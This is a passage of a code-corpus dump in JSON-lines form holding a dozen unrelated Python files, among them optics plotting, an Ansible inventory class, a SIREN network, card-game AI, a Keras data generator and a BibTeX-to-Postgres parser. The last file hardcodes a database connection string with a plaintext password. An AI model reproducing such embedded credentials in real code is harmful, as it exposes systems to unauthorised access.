print(data_file_name.head())\n drop_name = pandas.read_csv('dup.txt', sep=\"\\n\", header=None)\n # print (drop_name.head())\n # i = 0\n # for i in range(0, 30):\n # print(drop_name[0][i])\n drop_duplicates(data_file_name, drop_name)\n #print (data_file_name.head())\n\n #find_Duplicates(data_file_name, occurrence_list)\n print(data_file_name.head())\n save_excel_file(save_file_name, sheet, data_file_name)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Code/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"192051684","text":"from LightPipes import *\nimport matplotlib.pyplot as plt\n\n\ndef TheExample(N, part):\n fig = plt.figure(figsize=(15, 9.5))\n ax1 = fig.add_subplot(221)\n ax2 = fig.add_subplot(222)\n ax3 = fig.add_subplot(223)\n ax4 = fig.add_subplot(224)\n labda = 1000*nm\n size = 120*mm\n\n #z = f*part\n f = 100*cm\n f1 = 10*m\n f2 = f1*f/(f1-f)\n frac = f/f1\n newsize = frac*size\n w = 2*mm\n F = Begin(size, labda, N)\n F = RectAperture(w, w, 0, 0, 0, F)\n\n z = f*part\n F = Fresnel(8, F)\n# 1) Using Lens and Fresnel:\n F1 = Lens(f, 0, 0, F)\n F1 = Forvard(z, F1)\n phi1 = Phase(F1)\n phi1 = PhaseUnwrap(phi1)\n I1 = Intensity(0, F1)\n x1 = []\n for i in range(N):\n x1.append((-size/2+i*size/N)/mm)\n\n# 2) Using Lens + LensFresnel and Convert:\n # F2 = Lens(f1, 0, 0, F)\n F2 = LensForvard(f, z, F)\n F2 = Convert(F2)\n if part < 1:\n F2 = Interpol(size, N, 0, 0, 0, 1, F2)\n phi2 = Phase(F2)\n phi2 = PhaseUnwrap(phi2)\n I2 = Intensity(0, F2)\n x2 = []\n\n for i in range(N):\n x2.append((-size/2+i*size/N)/mm)\n\n ax1.plot(x1, phi1[int(N/2)], 'k--', label='Without spherical coordinates')\n ax1.plot(x2, phi2[int(N/2)], 'k', label='With spherical coordinates')\n #ax1.set_xlim(-newsize/2/mm, newsize/2/mm)\n #ax1.set_ylim(-2, 4)\n ax1.set_xlabel('x [mm]')\n ax1.set_ylabel('phase [rad]')\n ax1.set_title('phase, N = %d' % N)\n legend = ax1.legend(loc='upper center', shadow=True)\n\n ax2.plot(x1, I1[int(N/2)], 'k--', label='Without spherical coordinates')\n ax2.plot(x2, I2[int(N/2)], 'k', label='With spherical coordinates')\n # ax2.set_xlim(-newsize/2/mm, newsize/2/mm)\n #ax2.set_ylim(0, 1000)\n ax2.set_xlabel('x [mm]')\n ax2.set_ylabel('Intensity [a.u.]')\n ax2.set_title('intensity, N = %d' % N)\n legend = ax2.legend(loc='upper center', shadow=True)\n\n ax3.imshow(I1)\n ax3.axis('off')\n ax3.set_title('Without spherical coordinates')\n # ax3.set_xlim(int(N/2)-N*frac/2, int(N/2)+N*frac/2)\n #ax3.set_ylim(int(N/2)-N*frac/2, int(N/2)+N*frac/2)\n ax4.imshow(I2)\n ax4.axis('off')\n ax4.set_title('With spherical coordinates')\n plt.figtext(0.3, 0.95, 'Spherical Coordinates, f = 100cm lens\\nGrid dimension is: %d x %d pixels. This is %.2f run' % (\n N, N, part), fontsize=18, color='red')\n\n\n# TheExample(100) # 100 x 100 grid\nfor i in [0.1, 0.3, 0.5, 0.7, 1.3, 1.5, 1.7, 1.9]:\n TheExample(800, i)\n print(i)\n # 1000 x 1000 grid\nplt.show()\n","sub_path":"staff/Lens_Checker.py","file_name":"Lens_Checker.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35277838","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n '''\n Recursion\n '''\n if not inorder: return None\n root = TreeNode(preorder.pop(0))\n inorderIndex = inorder.index(root.val)\n root.left = self.buildTree(preorder, inorder[:inorderIndex])\n root.right = self.buildTree(preorder, inorder[inorderIndex+1:])\n\n return root\n\n # TC: O(n^2)\n\n # SC: O(n) I think if counting the recursive stack memory\n\n # IDEA:\n # use preorder to find the root\n # find the index of root in inorder using root.val\n # split inorder with the root_index\n # recursive call to left and right subtree of the root\n\n # ref: https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/discuss/34613/A-Python-recursive-solution\n # ref: https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/discuss/34579/Python-short-recursive-solution.\n","sub_path":"105_ConstructBinaryTreeFromPreorderAndInorderTraversal/105_1.py","file_name":"105_1.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"1824421","text":"import json\r\n\r\n\r\nclass HostsNotFound(Exception):\r\n \"\"\"Raised when a host does not exists in inventory\r\n Example: raise HostNotFound(\"host1\")\r\n \"\"\"\r\n pass\r\n\r\n\r\nclass GroupsNotFound(Exception):\r\n \"\"\"Raised when a group does not exists in inventory\r\n Example: raise GroupNotFound(\"group1\")\r\n \"\"\"\r\n pass\r\n\r\n\r\nclass AnsibleInventory:\r\n\r\n def __init__(self, *hosts):\r\n self._inventory = {\r\n \"_meta\": {\r\n \"hostvars\": {}\r\n },\r\n \"all\": {\r\n \"vars\": {},\r\n \"hosts\": set(),\r\n \"children\": set([\"ungrouped\"])\r\n },\r\n \"ungrouped\": {\r\n \"hosts\": set()\r\n }\r\n }\r\n\r\n # internal attributes for easy access to parts of above inventory\r\n self._all_hosts = self._inventory[\"all\"][\"hosts\"]\r\n self._all_children = self._inventory[\"all\"][\"children\"]\r\n self._ungrouped_hosts = self._inventory[\"ungrouped\"][\"hosts\"]\r\n self._hostvars = self._inventory[\"_meta\"][\"hostvars\"]\r\n\r\n for host in hosts:\r\n self.add_host(host)\r\n\r\n def add_host(self, host, **hostvars):\r\n if host not in self._all_hosts:\r\n self._all_hosts.add(host)\r\n self._ungrouped_hosts.add(host)\r\n self._hostvars[host] = hostvars\r\n\r\n def get_hostvars(self, host):\r\n try:\r\n return self._hostvars[host]\r\n except KeyError:\r\n raise HostsNotFound(host)\r\n\r\n def update_hostvars(self, host, **hostvars):\r\n try:\r\n self._hostvars[host].update(hostvars)\r\n except KeyError:\r\n raise HostsNotFound(host)\r\n\r\n def add_group(self, group, **groupvars):\r\n if group in (\"_meta\", \"ungrouped\"):\r\n raise ValueError(\r\n \"a new group cannot use the reserved name '{}'\".format(group))\r\n\r\n if group not in self.groups:\r\n self._inventory[group] = {\r\n \"vars\": groupvars,\r\n \"hosts\": set(),\r\n \"children\": set()\r\n }\r\n self._all_children.add(group)\r\n\r\n def get_groupvars(self, group):\r\n if group not in self.groups:\r\n raise GroupsNotFound(group)\r\n\r\n return self._inventory[group][\"vars\"]\r\n\r\n def update_groupvars(self, group, **groupvars):\r\n if group not in self.groups:\r\n raise GroupsNotFound(group)\r\n\r\n self._inventory[group][\"vars\"].update(groupvars)\r\n\r\n def add_hosts_to_group(self, group, *hosts):\r\n if group not in self.groups:\r\n raise GroupsNotFound(group)\r\n\r\n # Every host is always a member of 'all' hence do nothing\r\n if group == \"all\":\r\n return\r\n\r\n hosts = set(hosts)\r\n\r\n non_existing = hosts - self._all_hosts\r\n if non_existing:\r\n raise HostsNotFound(non_existing)\r\n\r\n self._ungrouped_hosts -= hosts\r\n self._inventory[group][\"hosts\"] |= hosts\r\n\r\n def add_children_to_group(self, parent, *children):\r\n # check all groups exists and they are allowed to be modified\r\n non_existing = set((parent,) + children) - set(self.groups)\r\n # FYI Python3 only syntax can be like:\r\n # non_existing = set([parent, *children]) - set(self.groups)\r\n if non_existing:\r\n raise GroupsNotFound(non_existing)\r\n\r\n # avoid circular dependency\r\n if parent in children:\r\n raise ValueError(\r\n \"group '{}' cannot be a child to itself\".format(parent))\r\n\r\n # finally add all children to parent\r\n self._inventory[parent][\"children\"] |= set(children)\r\n\r\n def keep_hosts_ungrouped_also(self, *hosts):\r\n hosts = set(hosts)\r\n non_existing = hosts - self._all_hosts\r\n if non_existing:\r\n raise HostsNotFound(non_existing)\r\n\r\n self._ungrouped_hosts |= hosts\r\n\r\n @property\r\n def hosts(self):\r\n return list(self._all_hosts)\r\n\r\n @property\r\n def ungrouped(self):\r\n return list(self._ungrouped_hosts)\r\n\r\n @property\r\n def groups(self):\r\n grps = list(self._inventory)\r\n grps.remove(\"ungrouped\")\r\n grps.remove(\"_meta\")\r\n return grps\r\n\r\n def __str__(self):\r\n class SetJSONEncoder(json.JSONEncoder):\r\n def default(self, obj):\r\n if isinstance(obj, set):\r\n return list(obj)\r\n # Let the base class default method raise the TypeError\r\n return json.JSONEncoder.default(self, obj)\r\n\r\n return json.dumps(self._inventory, indent=2, cls=SetJSONEncoder)\r\n\r\n def _host_as_ini(self, host):\r\n hostline = [host]\r\n for var, val in self._inventory[\"_meta\"][\"hostvars\"][host].items():\r\n hostline.append(\"{}={}\".format(var, val))\r\n\r\n return \" \".join(hostline)\r\n\r\n def as_ini(self):\r\n final = []\r\n\r\n # process ungrouped hosts\r\n for host in self._inventory[\"ungrouped\"][\"hosts\"]:\r\n final.append(self._host_as_ini(host))\r\n\r\n # process groups\r\n for group in set(self.groups) - {\"all\"}:\r\n data = self._inventory[group]\r\n\r\n if data[\"hosts\"]:\r\n final.append(\"\\n[{}]\".format(group))\r\n for host in data[\"hosts\"]:\r\n final.append(self._host_as_ini(host))\r\n\r\n if data[\"vars\"]:\r\n final.append(\"\\n[{}:vars]\".format(group))\r\n for var, val in data[\"vars\"].items():\r\n final.append(\"{}={}\".format(var, val))\r\n\r\n if data[\"children\"]:\r\n final.append(\"\\n[{}:children]\".format(group))\r\n for child in data[\"children\"]:\r\n final.append(\"{}\".format(child))\r\n\r\n # process all:vars\r\n if self._inventory[\"all\"][\"vars\"]:\r\n final.append(\"\\n[{}:{}]\".format(\"all\", \"vars\"))\r\n for var, val in self._inventory[\"all\"][\"vars\"].items():\r\n final.append(\"{}={}\".format(var, val))\r\n\r\n return \"\\n\".join(final) + \"\\n\"\r\n","sub_path":"Ops/ops/ansible_v2/ansinv.py","file_name":"ansinv.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"335910595","text":"from selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom lxml import etree\nimport time\n\ncategories = ['飞行器', '舰船舰艇', '枪械与单兵', '坦克装甲车辆', '火炮', '导弹武器', '太空装备', '爆炸物']\n\ndef store_relation(category, sub_category):\n with open('D:\\military\\military\\data\\weapon\\schema_huanqiujunshi.txt', 'a', encoding='utf-8') as file_obj:\n file_obj.write(category + \" subclass \" + sub_category)\n file_obj.write('\\n')\n file_obj.close()\n\ndef switch_category(browser, current_category_index):\n if current_category_index != 0:\n bt = browser.find_element_by_link_text(categories[current_category_index])\n bt.click()\n time.sleep(1)\n\ndef main():\n #浏览器打开\n # chromeOptions = Options()\n # chromeOptions.add_argument('C:/Users/92898/AppData/Local/Google/Chrome/User Data/Default/extension')\n # browser = webdriver.Chrome(chrome_options=chromeOptions)\n browser = webdriver.Chrome()\n browser.maximize_window()\n browser.get('http://weapon.huanqiu.com/weaponlist')\n wait = WebDriverWait(browser, 10)\n\n # 顶层concept\n for category in categories:\n store_relation(\"兵器\", category)\n\n #类目遍历\n for index in range(len(categories)):\n #类目转换\n switch_category(browser, index)\n html = etree.HTML(browser.page_source, etree.HTMLParser())\n sub_category = html.xpath('//div[@class=\"select\"]/ul[li[text()=\"大分类:\"]]/li/span[@class=\"list\"]/a/text()')\n for s_ca in sub_category:\n store_relation(categories[index], s_ca)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"WS/Final/military/military/construction/schema/weapon/huanqiujunshi_schema.py","file_name":"huanqiujunshi_schema.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19194282","text":"\"\"\"\nRename and move PDFs from bib database.\n\"\"\"\n\nimport argparse\nimport os\nimport re\nimport shutil\n\nfrom pybtex.database import parse_file\n\nFILE_FIELD = re.compile('^:(?P.*):PDF$')\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('bib', type=str, help='path to bib file')\n parser.add_argument('output', type=str, help='path to output directory')\n return parser.parse_args()\n\n\ndef handle_entry(output_dir, entry):\n old_filepath = re.match(FILE_FIELD, entry.fields['file']).group('filepath')\n new_filepath = os.path.join(output_dir, entry.key + '.pdf')\n shutil.move(old_filepath, new_filepath)\n entry.fields['file'] = f':{new_filepath}:PDF'\n\n\ndef main():\n args = parse_args()\n output_dir = os.path.abspath(args.output)\n data = parse_file(args.bib)\n for entry in data.entries.values():\n if 'file' in entry.fields:\n handle_entry(output_dir, entry)\n # An ugly hack against unnecessary escaping\n data_string = data.to_string('bibtex').replace('\\_', '_').replace('\\&', '&').replace('\\%', '%')\n with open(args.bib, 'w') as f:\n f.write(data_string)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bib_organizer.py","file_name":"bib_organizer.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"537934617","text":"##Working further with Siren, to experiment deeper with the network and see what really clicks.\n##Most of this taken from the siren-pytorch library, because I can't actually code lmao\n\nimport math\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom einops import rearrange\n\nfrom .utils import exists, enable\n\ndef cast_tuple(val, repeat = 1):\n return val if isinstance(val, tuple) else ((val,) * repeat)\n\n\n#Fourier features to be used on the input layer. thanks again alstro\n#May need to adjust std for optimal performance\nclass FourierFeatures(nn.Module):\n def __init__(self, in_features, out_features, std=1.):\n super().__init__()\n assert out_features % 2 == 0\n self.register_buffer('weight', torch.randn([out_features // 2, in_features]) * std)\n\n def forward(self, input):\n f = 2 * math.pi * input @ self.weight.T\n return torch.cat([f.cos(), f.sin()], dim=-1)\n\n#Custom activation. Will it work? ¯\\_(ツ)_/¯\n\nclass LayerActivation(nn.Module):\n def __init__(self, torch_activation=torch.sin, w0 = 1.):\n super().__init__()\n self.w0 = w0\n self.activation = torch_activation\n def forward(self, x):\n return self.activation(self.w0 * x)\n\n#aight I guess I have to just import the whole Siren module. okay then.\n\nclass SirenLayer(nn.Module):\n def __init__(self, dim_in, dim_out, w0 = 1., c = 6., is_first = False, use_bias = True, layer_activation=torch.sin, final_activation = None, num_linears=1, multiply=None):\n super().__init__()\n self.dim_in = dim_in\n self.is_first = is_first\n self.num_linears = num_linears\n self.multiply = multiply\n\n weight = torch.zeros(dim_out, dim_in)\n bias = enable(use_bias, torch.zeros(dim_out))\n self.init_(weight, bias, c = c, w0 = w0)\n\n self.weight = nn.Parameter(weight)\n self.bias = enable(use_bias, nn.Parameter(bias))\n self.activation = LayerActivation(torch_activation=layer_activation, w0=w0) if final_activation is None else final_activation\n\n def init_(self, weight, bias, c, w0):\n dim = self.dim_in\n\n w_std = (1 / dim) if self.is_first else (math.sqrt(c / dim) / w0)\n weight.uniform_(-w_std, w_std)\n\n if exists(bias):\n bias.uniform_(-w_std, w_std)\n\n def forward(self, x):\n for _ in range(self.num_linears):\n out = F.linear(x, self.weight, self.bias)\n if exists(self.multiply):\n out *= self.multiply\n out = self.activation(out)\n\n return out\n\n#because I don't wanna do 2 repos, here's a more \"open\" SirenNet class, and by that I mean just changing activations on the layers themselves lol\nclass SirenNetwork(nn.Module):\n def __init__(self, dim_in, dim_hidden, dim_out, num_layers, w0 = 1., w0_initial = 30., use_bias = True, layer_activation = None, final_activation = None, num_linears = 1, multiply=None, fourier=True):\n super().__init__()\n self.num_layers = num_layers\n self.dim_hidden = dim_hidden\n\n self.layers = nn.ModuleList([])\n\n #Fourier\n if fourier:\n self.layers.append(FourierFeatures(\n in_features = dim_in,\n out_features = dim_hidden\n ))\n else:\n self.layers.append(SirenLayer(\n dim_in = dim_in,\n dim_out = dim_hidden,\n w0 = w0_initial,\n use_bias = use_bias,\n is_first = True,\n layer_activation = None if not exists(layer_activation) else LayerActivation(torch_activation=layer_activation),\n num_linears=num_linears\n ))\n\n for ind in range(num_layers - 1):\n self.layers.append(SirenLayer(\n dim_in = dim_hidden,\n dim_out = dim_hidden,\n w0 = w0,\n use_bias = use_bias,\n layer_activation = None if not exists(layer_activation) else LayerActivation(torch_activation=layer_activation),\n num_linears=num_linears\n ))\n \n final_activation = nn.Identity() if not exists(final_activation) else final_activation\n self.last_layer = SirenLayer(dim_in = dim_hidden, dim_out = dim_out, w0 = w0, use_bias = use_bias, final_activation = final_activation, multiply=multiply)\n\n def forward(self, x, mods = None):\n mods = cast_tuple(mods, self.num_layers)\n\n for layer, mod in zip(self.layers, mods):\n x = layer(x)\n\n if exists(mod):\n x *= rearrange(mod, 'd -> () d')\n\n return self.last_layer(x)\n\n\nclass SirenWrapper(nn.Module):\n def __init__(self, net, image_width, image_height, latent_dim = None):\n super().__init__()\n assert isinstance(net, SirenNetwork), 'SirenWrapper must receive a Siren network'\n\n self.net = net\n self.image_width = image_width\n self.image_height = image_height\n\n self.modulator = None\n if exists(latent_dim):\n self.modulator = Modulator(\n dim_in = latent_dim,\n dim_hidden = net.dim_hidden,\n num_layers = net.num_layers\n )\n\n tensors = [torch.linspace(-1, 1, steps = image_width), torch.linspace(-1, 1, steps = image_height)]\n mgrid = torch.stack(torch.meshgrid(*tensors), dim=-1)\n mgrid = rearrange(mgrid, 'h w c -> (h w) c')\n\n self.register_buffer('grid', mgrid)\n\n def forward(self, img = None, *, latent = None):\n modulate = exists(self.modulator)\n assert not (modulate ^ exists(latent)), 'latent vector must be only supplied if `latent_dim` was passed in on instantiation'\n\n mods = self.modulator(latent) if modulate else None\n\n coords = self.grid.clone().detach().requires_grad_()\n out = self.net(coords, mods)\n out = rearrange(out, '(h w) c -> () c h w', h = self.image_height, w = self.image_width)\n\n if exists(img):\n return F.mse_loss(img, out)\n\n return out","sub_path":"deep_daze/siren.py","file_name":"siren.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"648305875","text":"class Player():\r\n\r\n def __init__(self, num, name):\r\n # num = player number\r\n self.num = num\r\n # name = player name\r\n self.name = name\r\n # hand is the cards in the players hand\r\n self.hand = []\r\n # cc is the card count\r\n self.cc = 0\r\n # plan to use .active to determine the current turn\r\n self.active = False\r\n # .next on a player as a link to the next players turn maybe?\r\n self.next = self\r\n\r\n\r\n def drawFromDeck(self, deck):\r\n if len(deck) > 0:\r\n self.hand.append(deck.pop())\r\n self.cc += 1\r\n\r\n def newHand(self, deck, cardNum=7):\r\n for i in range(0, cardNum):\r\n self.drawFromDeck(deck)\r\n\r\n def nextstep(self, borad):\r\n move = input(\"What will you do? (h for help): \")\r\n return move.lower()\r\n\r\nclass BartokAIPlayer(Player):\r\n\r\n def nextstep(self, board):\r\n index = self.validIndexToPlay(board)\r\n if index == -1:\r\n return 'draw'\r\n else:\r\n return 'play ' + str(index)\r\n\r\n def validIndexToPlay(self, board):\r\n for i in range(len(self.hand)):\r\n if self.hand[i].sameSuit(board.top) or self.hand[i].sameNumber(board.top):\r\n return i\r\n return -1\r\n\r\nclass KingsAIPlayer(Player):\r\n def nextstep(self, board):\r\n action = self.validPlay(board)\r\n if action[0] == -1: #cannot play any card on hand\r\n action = self.validMove(board) #try to move card on board\r\n if action[0] == -1: #no valid move\r\n return 'end' #end the turn\r\n else: #valid move\r\n return 'move: ' + action[0] + ', ' + action[1]\r\n else: #valid play\r\n return 'play: ' + str(action[0]) + ', ' + action[1]\r\n\r\n def validPlay(self, board):\r\n #play K to the corner (get all the empty fields -> play K)\r\n fieldsName = ['n', 's', 'e', 'w']\r\n for i in range(len(self.hand)):\r\n if self.hand[i].val == 13:\r\n if board.boardDic['c1'].top.val == 0:\r\n return [i, 'c1']\r\n elif board.boardDic['c2'].top.val == 0:\r\n return [i, 'c2']\r\n elif board.boardDic['c3'].top.val == 0:\r\n return [i, 'c3']\r\n elif board.boardDic['c4'].top.val == 0:\r\n return [i, 'c4']\r\n\r\n # play the card to the empty field(not the corner)\r\n for name in fieldsName:\r\n if board.boardDic[name].top.val == 0:\r\n return [0, name]\r\n\r\n # play card to a non-empty field\r\n for key, field in board.boardDic.items():\r\n if field.top != 0: #the field is not empty\r\n for i in range(len(self.hand)): #check cards on hand\r\n if self.hand[i].diffColor(field.top) and self.hand[i].val == field.top.val - 1:\r\n return [i, key]\r\n\r\n #no card can be played\r\n return [-1, \"\"]\r\n\r\n\r\n def validMove(self, board):\r\n #move K to the corner\r\n fieldsName = ['n','s','e','w']\r\n allFieldsName = ['n', 's', 'e', 'w', 'c1', 'c2', 'c3', 'c4']\r\n cornerName = ['c1', 'c2', 'c3', 'c4']\r\n for name in fieldsName:\r\n if board.boardDic[name].bot.val == 13:\r\n for dest in cornerName:\r\n if board.boardDic[dest].top.val == 0:\r\n return [name, dest]\r\n\r\n #no K on the board to move: try to move fields\r\n for source in fieldsName:\r\n for destination in allFieldsName:\r\n sCard = board.boardDic[source].bot\r\n dCard = board.boardDic[destination].top\r\n if sCard.diffColor(dCard) and sCard.val == dCard.val - 1 :\r\n return [source, destination]\r\n return [-1, \"\"]","sub_path":"proj3rjwoods3postFSMandAI/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"66682693","text":"class Solution:\n def find_square(self, matrix, border):\n length_zero = len(matrix)\n length_one = len(matrix[0])\n mid = int(len(border)/2)\n temp_border = list()\n for i in range(len(border)):\n if i == mid:\n if border[i][0]+1 < length_zero and border[i][1]+1 < length_one:\n temp_border.append([border[i][0]+1, border[i][1]])\n temp_border.append([border[i][0]+1, border[i][1]+1])\n temp_border.append([border[i][0], border[i][1]+1])\n if i < mid:\n if border[i][0] + 1 < length_zero:\n temp_border.append([border[i][0]+1, border[i][1]])\n if i > mid:\n if border[i][1] + 1 < length_one:\n temp_border.append([border[i][0], border[i][1]+1])\n for e in temp_border:\n if matrix[e[0]][e[1]] == '0':\n return len(border)\n if len(temp_border) == len(border)+2:\n return len(border) + self.find_square(matrix,temp_border)\n else:\n return len(border)\n \n def maximalSquare(self, matrix: List[List[str]]) -> int:\n result = 0\n for rindex, row in enumerate(matrix):\n for cindex, col in enumerate(row):\n if col == '1':\n temp = self.find_square(matrix, [[rindex, cindex]])\n if result < temp:\n result = temp\n return result\n","sub_path":"2020_02_21/runroz_221.py","file_name":"runroz_221.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"535849150","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 8 18:54:31 2020\n\n@author: ryan\n\"\"\"\n\nimport os\nimport sys\nimport random\n\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow import keras\nos.chdir(os.path.dirname(__file__))\n\nclass DataGen(keras.utils.Sequence):\n def __init__(self, ids,path, batch_size=8, image_size=128,form=\"tif\",shuffle=True,color=\"rgb\"):\n self.ids = ids\n self.path = path\n self.batch_size = batch_size\n self.image_size = image_size\n self.shuffle=shuffle\n self.on_epoch_end()\n self.form=form\n self.color=color\n \n def __load__(self, id):\n ## Path\n image_path1 = self.path+\"/image/\"+id+\".\"+self.form\n mask_path1 = self.path+\"/mask/\"+id+\"_mask.\"+self.form\n image_path2 = self.path+\"/image_aug/\"+id+\".\"+self.form\n mask_path2 = self.path+\"/mask_aug/\"+id+\"_mask.\"+self.form\n ## Reading Image and Mask\n if self.color==\"rgb\":\n image = cv2.imread(image_path1, 1)\n if type(image) is not np.ndarray:\n image = cv2.imread(image_path2, 1)\n if type(image) is not np.ndarray:\n raise ValueError([image_path2,image_path1])\n image = cv2.resize(image,(self.image_size, self.image_size))\n if self.color==\"gray\":\n image = cv2.imread(image_path1, 0)\n if type(image) is not np.ndarray:\n image = cv2.imread(image_path2, 0)\n if type(image) is not np.ndarray:\n raise ValueError([image_path2,image_path1])\n image = cv2.resize(image,(self.image_size, self.image_size))\n image=np.expand_dims(image,axis=-1)\n mask=cv2.imread(mask_path1,0)\n if type(mask) is not np.ndarray:\n mask=cv2.imread(mask_path2,0)\n if type(mask) is np.ndarray:\n mask=cv2.resize(mask, (self.image_size, self.image_size))\n mask=np.expand_dims(mask, axis=-1)\n mask = mask/255.0\n else:\n mask=image\n mask=mask>0\n ## Normalizaing \n image = image/255.0\n \n \n return image, mask\n \n def __getitem__(self, index):\n if (index+1)*self.batch_size > len(self.ids):\n files_batch = self.indexs[index*self.batch_size:]\n else:\n files_batch = self.indexs[index*self.batch_size:(index+1)*self.batch_size]\n \n image = []\n mask = []\n \n for index in files_batch:\n _img,_mask=self.__load__(index)\n image.append(_img)\n mask.append(_mask)\n \n image = np.array(image)\n mask = np.array(mask)\n \n return image, mask\n \n \n def on_epoch_end(self):\n self.indexs = self.ids\n if self.shuffle == True:\n np.random.shuffle(self.indexs)\n \n def __len__(self):\n return int(np.floor(len(self.ids)/float(self.batch_size)))","sub_path":"MedicalImage/data_generate.py","file_name":"data_generate.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"264169009","text":"#-*- coding:UTF-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom models import user\nfrom models import content\n\n\ndef index(request):\n\tpass\n\ndef add_user(request):\n\tname = request.GET.get('name')\n\tsex = request.GET.get('sex')\n\tnew_user = user(name=name, sex=sex)\n\tnew_user.save()\n\tsex_cn ={\n\t\t\"1\":u\"男\",\n\t\t\"0\":u\"女\",\n\t}\n\treturn HttpResponse(\"OK,%s %s\"% (name,sex_cn[sex]))\n\ndef register(request):\n\tblog_content = content.objects.get(pk=6)\n\tblogs =[\n\t\t\t{\n\t\t\t\t'id':blog_content.id,\n\t\t\t\t'title':'我是标题1',\n\t\t\t\t'pubDate':blog_content.update_time,\n\t\t\t\t'author':{\n\t\t\t\t\t'name':blog_content.author,\n\t\t\t\t},\n\t\t\t\t'content':blog_content.content,\n\t\t\t},\n\t\t ]\n\n\tdata = {\n\t\t'blogs':blogs,\n\t}\n\treturn render_to_response('base.html', data)\n\n\n\n","sub_path":"temp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"443148138","text":"import time\nimport datetime\nimport psycopg2\nimport bibtexparser\n\n# this is an application for pars all metadataes from bibtex and insert in table\nLOG = \"C:/Users/hosseiam/PycharmProjects/hash_generator/logfile.log\"\n#LOG = \"/home/azamh/pythonFiles/hash_generator/logfile.log\"\n#================= public arguments==============================\nconString = \"dbname='dbexcitetest' user='postgres' host='localhost' password='sql!123'\"\n\ndef select_data(conn, cur ):\n t0 = time.time()\n\n print(\"Select Data from Table is in Progress ....\")\n\n # cur.execute(\"\"\"SELECT * FROM ES_newmodel_Bibtexes where ref_id = 15111 limit 1\"\"\")\n cur.execute(\"\"\"SELECT * FROM ES_newmodel_Bibtexes where ref_bibtex like '%pmid%'\"\"\")\n rows = cur.fetchall()\n # print(\"rows number: \", len(rows))\n row_count = 0\n l_dic_query = []\n for row in rows:\n # ref_id , ref_bibtex\n temp_ref_entit = {}\n\n ref_id = row[0]\n ref_bibtex = row[1]\n\n temp_ref_entit['ref_id'] = ref_id\n temp_ref_entit['ref_bibtex'] = ref_bibtex\n temp_ref_entit['author_name'] = []\n temp_ref_entit['year'] = []\n temp_ref_entit['title'] = ''\n temp_ref_entit['journals'] = []\n temp_ref_entit['pages'] = ''\n temp_ref_entit['volume'] = ''\n temp_ref_entit['numbers'] = ''\n temp_ref_entit['doi'] = ''\n temp_ref_entit['pmid'] = ''\n temp_ref_entit['ID'] = ''\n temp_ref_entit['others'] = ''\n\n l_dic_query.append(temp_ref_entit)\n t_dic_query = tuple(l_dic_query)\n t1 = time.time()\n total = t1 - t0\n print(\"Select Process Time : \", total)\n return t_dic_query\n\ndef es_newmodel_bibtexes_20171020(conn, cur, insertdict ):\n # print (insertdict)\n # ref_id integer, ref_bibtex text, author_name text[], year text[], title text, journals text[], pages text, volume text, numbers text, doi text, pmid text, others text\n query = \"\"\"INSERT INTO es_newmodel_bibtexes_20171020 (ref_id, ref_bibtex, author_name, year, title, journals, pages, volume, numbers, doi, pmid , ID , others)\n VALUES (%(ref_id)s, %(ref_bibtex)s, %(author_name)s, %(year)s, %(title)s, %(journals)s, %(pages)s, %(volume)s, %(numbers)s, %(doi)s, %(pmid)s, %(ID)s, %(others)s)\"\"\"\n # print (\"ben_test2:\"+str(query))\n cur.execute(query, insertdict)\n conn.commit()\n\ndef bibtex_parser(lsofRecords):\n # we need ref_id and ref_bibtex from this record\n ref_id = lsofRecords['ref_id']\n ref_bibtex = lsofRecords['ref_bibtex']\n # print(\"ref_id is : \", lsofRecords['ref_id'])\n print(lsofRecords['ref_bibtex'])\n\n dic_temp = {}\n\n # using bibtexparser to parse bibtex to extract author, title, year, journal\n bib_database = bibtexparser.loads(ref_bibtex)\n for item1 in bib_database.entries:\n author_name = []\n year = []\n journals = []\n title = \"\"\n others = \"\"\n # author_name, year, title, journals, pages, volume, numbers, doi, pmid, others\n if ('author' 